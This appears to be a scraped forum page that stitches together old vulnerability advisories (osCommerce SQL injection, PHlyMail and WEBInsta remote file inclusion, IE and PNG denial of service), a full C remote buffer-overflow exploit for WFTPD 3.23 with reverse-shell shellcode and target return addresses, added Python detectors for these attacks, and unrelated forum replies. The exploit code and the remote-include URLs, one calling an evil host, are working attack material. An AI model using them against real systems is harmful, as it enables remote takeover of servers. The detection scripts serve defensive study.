Version(s): 2.2 Milestone 2
Description: A vulnerability was reported in osCommerce. A remote user can inject SQL commands.
The 'shopping_cart.php' script does not properly validate user-supplied input, as the magic quotes emulation implementation contains a flaw. A remote user can supply a specially crafted parameter value to execute SQL commands on the underlying database.
A remote user can exploit the tep_cache_also_purchased() function in 'cache.php' to determine whether files exist or not and determine the installation path.
James Bercegay of the GulfTech Security Research Team discovered this vulnerability.
The original advisory is available at:
http://www.gulftech.org/?node=research&article_id=00110-08172006
Impact: A remote user can execute SQL commands on the underlying database.
A remote user can determine the installation path and determine whether specified files exist on the target system.
Solution: The vendor has issued a fix (2.2 Milestone 2 060817 Update), available at:
http://www.oscommerce.com/solutions/downloads
The osCommerce advisory is available at:
http://forums.oscommerce.com/index.php?showtopic=223556&pid=918371
|
|
|
PHlyMail Include File Bug in '_PM_['path']['handler']' Parameter Lets Remote Users Execute Arbitrary
Version(s): 3.4.4 and prior versions
Description: A vulnerability was reported in PHlyMail. A remote user can include and execute arbitrary code on the target system.
The 'handlers/email/mod.listmail.php' script does not properly validate user-supplied input in the '_PM_['path']['handler']' parameter. A remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.
A demonstration exploit URL is provided:
http://[target]/[phlymail_path]/handlers/email/mod.listmail.php?_PM_[path][handler]=[http://www.myevilsite.com/evil_scripts.txt]
Kacper (a.k.a Rahim) discovered this vulnerability.
Impact: A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
|
|
|
Code:
```c
/*
 * wftpd_exp.c
 * WFTPD server 3.23 (SIZE) 0day remote buffer overflow exploit
 * coded by h07 <h07@interia.pl>
 * tested on XP SP2 polish, 2000 SP4 polish
 * example..
 C:\>wftpd_exp 0 0 192.168.0.2 h07 open 192.168.0.1 4444
 [*] WFTPD server 3.23 (SIZE) 0day remote buffer overflow exploit
 [*] coded by h07 <h07@interia.pl>
 [*] FTP response: 331 Give me your password, please
 [*] FTP response: 230 Logged in successfully
 [+] sending buffer: ok
 [*] press enter to quit
 C:\>nc -l -p 4444
 Microsoft Windows XP [Wersja 5.1.2600]
 (C) Copyright 1985-2001 Microsoft Corp.
 C:\wftpd323>
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>

#define BUFF_SIZE 1024
#define PORT 21

//win32 reverse shellcode (metasploit.com); XOR-encoded, the decoder stub at
//the front restores it with the same key (0x989210b6) that main() uses below
char shellcode[] =
"\x31\xc9\x83\xe9\xb8\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xb6"
"\x10\x92\x98\x83\xeb\xfc\xe2\xf4\x4a\x7a\x79\xd5\x5e\xe9\x6d\x67"
"\x49\x70\x19\xf4\x92\x34\x19\xdd\x8a\x9b\xee\x9d\xce\x11\x7d\x13"
"\xf9\x08\x19\xc7\x96\x11\x79\xd1\x3d\x24\x19\x99\x58\x21\x52\x01"
"\x1a\x94\x52\xec\xb1\xd1\x58\x95\xb7\xd2\x79\x6c\x8d\x44\xb6\xb0"
"\xc3\xf5\x19\xc7\x92\x11\x79\xfe\x3d\x1c\xd9\x13\xe9\x0c\x93\x73"
"\xb5\x3c\x19\x11\xda\x34\x8e\xf9\x75\x21\x49\xfc\x3d\x53\xa2\x13"
"\xf6\x1c\x19\xe8\xaa\xbd\x19\xd8\xbe\x4e\xfa\x16\xf8\x1e\x7e\xc8"
"\x49\xc6\xf4\xcb\xd0\x78\xa1\xaa\xde\x67\xe1\xaa\xe9\x44\x6d\x48"
"\xde\xdb\x7f\x64\x8d\x40\x6d\x4e\xe9\x99\x77\xfe\x37\xfd\x9a\x9a"
"\xe3\x7a\x90\x67\x66\x78\x4b\x91\x43\xbd\xc5\x67\x60\x43\xc1\xcb"
"\xe5\x53\xc1\xdb\xe5\xef\x42\xf0\xb6\x10\x92\x98\xd0\x78\x92\x98"
"\xd0\x43\x1b\x79\x23\x78\x7e\x61\x1c\x70\xc5\x67\x60\x7a\x82\xc9"
"\xe3\xef\x42\xfe\xdc\x74\xf4\xf0\xd5\x7d\xf8\xc8\xef\x39\x5e\x11"
"\x51\x7a\xd6\x11\x54\x21\x52\x6b\x1c\x85\x1b\x65\x48\x52\xbf\x66"
"\xf4\x3c\x1f\xe2\x8e\xbb\x39\x33\xde\x62\x6c\x2b\xa0\xef\xe7\xb0"
"\x49\xc6\xc9\xcf\xe4\x41\xc3\xc9\xdc\x11\xc3\xc9\xe3\x41\x6d\x48"
"\xde\xbd\x4b\x9d\x78\x43\x6d\x4e\xdc\xef\x6d\xaf\x49\xc0\xfa\x7f"
"\xcf\xd6\xeb\x67\xc3\x14\x6d\x4e\x49\x67\x6e\x67\x66\x78\x62\x12"
"\xb2\x4f\xc1\x67\x60\xef\x42\x98";

//patch the connect-back IP and port into the encoded payload (the caller
//pre-XORs them with the key, so the decoder stub yields the real values)
void config_shellcode(unsigned long ip, unsigned short port)
{
    memcpy(&shellcode[184], &ip, 4);
    memcpy(&shellcode[190], &port, 2);
}

//return addresses: one JMP ESI gadget per tested OS/language build
unsigned long target[] =
{
    0x7d16887b, //JMP ESI (XP SP2 polish)
    0x776f2015, //JMP ESI (2000 SP4 polish)
    0x7cb9e082, //JMP ESI (XP SP2 english)
    0x7848a5f1, //JMP ESI (2000 SP4 english)
    0x7ca96834  //JMP ESI (XP SP2 german)
};

char buffer[BUFF_SIZE];

int main(int argc, char *argv[])
{
    int sock, id, opt, r_len;
    unsigned long eip;
    unsigned long connectback_IP;
    unsigned short connectback_port;
    struct hostent *he;
    struct sockaddr_in client;
    WSADATA wsa;

    printf("\n[*] WFTPD server 3.23 (SIZE) 0day remote buffer overflow exploit\n");
    printf("[*] coded by h07 <h07@interia.pl>\n");
    if(argc < 8)
    {
        printf("[*] usage:..\n %s <ID> <opt> <host> <user> <pass> <connectback_IP> <connectback_port>\n\n", argv[0]);
        printf("[*] ID list:\n");
        printf("[>] 0: XP SP2 polish\n");
        printf("[>] 1: 2000 SP4 polish\n");
        printf("[>] 2: XP SP2 english\n");
        printf("[>] 3: 2000 SP4 english\n");
        printf("[>] 4: XP SP2 german\n\n");
        printf("[*] opt - WFTPD option 'restrict to home directory and below'\n");
        printf("[>] 0: disabled\n");
        printf("[>] 1: enabled\n\n");
        printf("[*] sample: %s 0 0 192.168.0.2 h07 open 192.168.0.1 4444\n\n", argv[0]);
        exit(0);
    }
    WSAStartup(MAKEWORD(2, 0), &wsa);
    id = atoi(argv[1]);
    opt = atoi(argv[2]);
    if((id > 4) || (id < 0))
    {
        printf("[-] ID error: unknown target\n");
        exit(-1);
    }
    if((opt > 1) || (opt < 0))
    {
        printf("[-] opt error: unknown option\n");
        exit(-1);
    }
    eip = target[id];
    //IP and port are XORed with the decoder key before being patched in
    connectback_IP = inet_addr(argv[6]) ^ (ULONG)0x989210b6;
    connectback_port = htons(atoi(argv[7])) ^ (USHORT)0x9892;
    config_shellcode(connectback_IP, connectback_port);

    sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if((he = gethostbyname(argv[3])) == NULL)
    {
        printf("[-] Unable to resolve\n");
        exit(-1);
    }
    client.sin_addr = *((struct in_addr *)he->h_addr);
    client.sin_port = htons(PORT);
    client.sin_family = AF_INET;
    if(connect(sock, (struct sockaddr *) &client, sizeof(client)) == -1)
    {
        printf("[-] error: connect()\n");
        exit(-1);
    }
    recv(sock, buffer, BUFF_SIZE -1, 0);

    //USER
    memset(buffer, 0, BUFF_SIZE);
    sprintf(buffer, "USER %s\r\n", argv[4]);
    send(sock, buffer, strlen(buffer), 0);
    recv(sock, buffer, BUFF_SIZE -1, 0);
    printf("[*] FTP response: %s", buffer);

    //PASS
    memset(buffer, 0, BUFF_SIZE);
    sprintf(buffer, "PASS %s\r\n", argv[5]);
    send(sock, buffer, strlen(buffer), 0);
    recv(sock, buffer, BUFF_SIZE -1, 0);
    printf("[*] FTP response: %s", buffer);
    if(strstr(buffer, "530") != 0) exit(-1); //530 = login failed

    //SIZE: the whole buffer is 0x90 (NOP) padding; the path prefix decides at
    //which offset the saved return address sits (531 for "/", 532 for "//")
    memset(buffer, 0x90, BUFF_SIZE);
    memcpy(buffer, "SIZE ", 5);
    switch(opt)
    {
        case 0:
        {
            memcpy(buffer + 5, "/", 1);
            r_len = 531;
            break;
        }
        case 1:
        {
            memcpy(buffer + 5, "//", 2);
            r_len = 532;
            break;
        }
    }
    //layout: "SIZE " + prefix + shellcode at offset 7 + NOPs + EIP + CRLF
    memcpy(buffer + 7, shellcode, sizeof(shellcode) -1);
    *((unsigned long*)(&buffer[r_len])) = eip;
    memcpy(buffer + (r_len + 4), "\r\n\x00", 3);
    if(send(sock, buffer, strlen(buffer), 0) != -1)
        printf("[+] sending buffer: ok\n");
    else
        printf("[-] sending buffer: failed\n");
    printf("[*] press enter to quit\n");
    getchar();
    return 0;
}
//EoF
```
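From the defender's side, the SIZE request above is easy to tell apart from legitimate traffic: the argument is over 500 bytes and consists mostly of non-printable padding. The following is an added example, not part of h07's code, that scans captured FTP control-channel commands for that shape; the length threshold and the list of path-taking verbs are assumptions.

```python
# Added example (not part of h07's code above): flag FTP control-channel commands whose
# argument has the shape of the WFTPD SIZE overflow: a path far longer than any real
# path, padded with non-printable bytes. Threshold and verb list are assumptions.
MAX_SANE_ARG = 260  # Windows MAX_PATH; the exploit argument above is 531+ bytes
PATH_VERBS = (b"SIZE", b"RETR", b"STOR", b"CWD", b"DELE", b"MDTM")

def parse_ftp_command(line):
    """Split one raw control-channel line (bytes, CRLF-terminated) into verb and argument."""
    verb, _, arg = line.rstrip(b"\r\n").partition(b" ")
    return verb.upper(), arg

def assess_command(line):
    """Return a dict of reasons a path-taking command looks like an overflow attempt, else None."""
    verb, arg = parse_ftp_command(line)
    if verb not in PATH_VERBS:
        return None
    non_printable = sum(1 for b in arg if b < 0x20 or b > 0x7e)
    reasons = []
    if len(arg) > MAX_SANE_ARG:
        reasons.append("argument length %d exceeds %d" % (len(arg), MAX_SANE_ARG))
    if non_printable:
        reasons.append("%d non-printable bytes in path argument" % non_printable)
    if not reasons:
        return None
    return {"verb": verb.decode("ascii"), "arg_len": len(arg), "reasons": reasons}

def scan_session(lines):
    """Assess every command of a captured session; returns only the suspicious ones."""
    return [r for r in (assess_command(l) for l in lines) if r is not None]

# Constructed sample session: benign commands plus one SIZE with the exploit's
# geometry (prefix, 0x90 padding, a dummy 4-byte return-address slot), no shellcode.
SAMPLE_SESSION = [
    b"USER anonymous\r\n",
    b"PASS guest@example.org\r\n",
    b"SIZE /pub/readme.txt\r\n",
    b"SIZE /" + b"\x90" * 525 + b"ZZZZ" + b"\r\n",
]

if __name__ == "__main__":
    for finding in scan_session(SAMPLE_SESSION):
        print(finding)
```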
|
|
|
Summary:
Microsoft Internet Explorer is prone to a denial-of-service vulnerability.
This issue occurs because the application fails to load a DLL library when instantiated as an ActiveX control.
An attacker may exploit this issue to crash Internet Explorer, effectively denying service to legitimate users, and may cause arbitrary code to run within the context of the application.
Attackers can exploit this issue via a web client.
The following proof of concept is available:
http://www.securityfocus.com/data/vulnerabilities/exploits/internet-explorer-msoe.dll.html
|
|
|
Vulnerable product: http://www.webinsta.com/download.html (WEBInsta CMS 0.3.1)
Author: Yns - yns.zaxaz.com
Exploit:
http://[HOST]/[PATH]/modules/usersonline/users.php?module_dir=[REMOTE_FILE]
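Both the PHlyMail '_PM_[path][handler]' bug and this WEBInsta 'module_dir' bug leave the same trace in a web server log: a request parameter whose value is a full remote URL. The following is an added example, not code from either advisory, that scans access-log lines for that pattern; the log lines and hostnames in it are constructed placeholders.

```python
# Added example (not code from the advisories above): flag access-log requests whose
# query parameters carry a remote URL, the shape of the PHlyMail '_PM_[path][handler]'
# and WEBInsta 'module_dir' include-file bugs. Log lines below are constructed.
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Combined Log Format: client, method, request path, status; other fields ignored.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\w+) (\S+) [^"]*" (\d{3})')
# Parameters the two advisories name; any other parameter holding a URL is flagged too.
KNOWN_INCLUDE_PARAMS = {"_PM_[path][handler]", "module_dir"}
REMOTE_URL_RE = re.compile(r'^(https?|ftp)://', re.IGNORECASE)

def find_rfi_params(request_path):
    """Return (name, value) pairs from the query string whose value is a remote URL."""
    query = urlsplit(request_path).query
    return [(name, value) for name, value in parse_qsl(query, keep_blank_values=True)
            if REMOTE_URL_RE.match(unquote(value).strip())]

def scan_access_log(lines):
    """Return one finding per request that carries a remote-URL parameter."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parseable access-log line
        client, method, path, status = m.groups()
        hits = find_rfi_params(path)
        if hits:
            findings.append({
                "client": client,
                "script": urlsplit(path).path,
                "params": [name for name, _ in hits],
                "known": any(name in KNOWN_INCLUDE_PARAMS for name, _ in hits),
                "status": int(status),  # 200 on the include target suggests success
            })
    return findings

# Constructed sample log (placeholder hosts and paths, not real indicators).
SAMPLE_LOG = [
    '203.0.113.5 - - [17/Aug/2006:10:00:01 +0000] "GET /phlymail/handlers/email/mod.listmail.php?_PM_[path][handler]=http://attacker.example/evil.txt HTTP/1.1" 200 512',
    '203.0.113.5 - - [17/Aug/2006:10:00:02 +0000] "GET /cms/modules/usersonline/users.php?module_dir=http%3A%2F%2Fattacker.example%2Fshell.txt HTTP/1.1" 200 77',
    '198.51.100.9 - - [17/Aug/2006:10:00:03 +0000] "GET /shop/shopping_cart.php?products_id=12 HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for finding in scan_access_log(SAMPLE_LOG):
        print(finding)
```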
|
|
|
Microsoft Windows is reportedly prone to a remote denial-of-service vulnerability because the PNG-rendering portion of the operating system fails to handle malicious PNG (Portable Network Graphics) files.
This issue may cause Windows Explorer to consume excessive resources and crash, denying service to legitimate users.
The following exploit files demonstrate this issue:
http://www.securityfocus.com/data/vulnerabilities/exploits/Xsec-06-01.rar
http://www.securityfocus.com/data/vulnerabilities/exploits/19520.pl
|
|
|
Checked and sent you a PM.
Regards
|
|
|
I have checked the host's bug and sent you a PM; as for the forum, go ahead and update to the new patch.
Regards
|
|
|
Hi
Should you upgrade to 2.0 now and then check, or keep it as it is so it can be checked?
Regards
|
|
|
hehe, Z0rr0, try doing it again and see how it goes
|
|
|
Why don't you go to its homepage to download version 2.0? It's in the footer.
|
|
|
Next time, please post in the correct forum.
|
|
|
Get more info here:
http://www.computerhope.com/jargon/l/lmhost.htm
|
|
|
Go to :
http://www.computerhope.com/forhlp.htm
And learn more for FOR command
|
|
|
Note: you should use those tools right after accidentally deleting a file; avoid restarting and copying more data onto the disk.
|
|
|
Thanks G.A, I've been too busy these past few days to come in and reply sooner.
|
|
|
Have a quick look at the rules on forum checks. Read this topic carefully:
http://www.vbulletin.com/forum/showthread.php?t=194061
As for the hosting, I'll PM you once the check is done.
Regards
|
|
|
See the details here:
http://www.ntfs.com/ntfs_vs_fat.htm
|